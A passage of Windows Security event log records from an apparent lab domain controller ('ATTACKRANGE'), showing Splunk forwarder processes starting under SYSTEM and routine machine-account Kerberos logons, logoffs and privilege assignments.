TaskCategory=Process Creation
OpCode=Info
RecordNumber=263780
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263784
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75EEC2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263783
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x75EEC2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51519
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:26:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263782
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x75EEC2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263785
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263787
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263786
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1374
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263788
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263789
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263791
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1988
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263790
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263797
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761E32
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263796
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x761E32
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51527
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263795
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761E32
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263794
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761DC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263793
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x761DC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51526
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263792
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x761DC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263800
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x762B97
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263799
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x762B97
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51536
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263798
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x762B97
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263801
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x188c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263803
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263802
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263804
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263805
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
